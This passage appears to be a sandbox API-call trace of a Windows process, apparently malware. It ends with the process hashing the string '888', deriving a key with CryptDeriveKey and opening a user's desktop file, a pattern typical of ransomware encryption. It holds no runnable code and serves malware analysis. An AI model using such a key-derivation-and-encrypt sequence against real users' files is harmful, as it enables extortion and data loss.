lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0105.543] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0105.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0105.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.544] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0105.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.544] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.545] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.545] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71b38 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0105.545] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0105.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0105.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a58, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0105.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0105.546] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69850 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3) returned 0x2a71ab8 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0105.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0105.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69760 [0105.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0105.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0105.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69850 | out: hHeap=0x2af0000) returned 1 [0105.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0105.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0105.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0105.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.548] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.548] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.548] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.548] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.548] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0105.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9c40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0105.549] CryptHashData (hHash=0x9a3b80, pbData=0x2a71ab8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0105.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.550] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.552] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.552] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.552] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.552] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.552] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0105.552] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.556] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0105.556] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.556] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0105.556] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9c70, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0105.557] CryptDeriveKey (in: hProv=0x9bee68, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4780) returned 1 [0105.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.557] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.557] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0105.557] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.557] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0105.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0105.557] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0105.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.557] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.558] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/TtFu8ac2GuQ.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ttfu8ac2guq.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, 